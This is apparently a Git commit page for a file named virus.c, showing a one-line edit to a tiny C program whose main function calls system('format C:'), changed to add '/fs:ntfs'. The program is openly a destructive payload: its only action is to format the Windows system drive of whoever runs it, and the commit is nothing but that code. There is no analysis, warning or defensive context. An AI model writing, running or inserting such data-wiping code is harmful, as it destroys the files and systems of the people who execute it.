Update virus.c
This commit is contained in:
parent
7f65d652ce
commit
229699196e
1 changed files with 1 additions and 1 deletions
2
virus.c
2
virus.c
|
@ -1,4 +1,4 @@
|
|||
#include <windows.h>
|
||||
int main(){
|
||||
system("format C:");
|
||||
system("format C: /fs:ntfs");
|
||||
}
|
Loading…
Reference in a new issue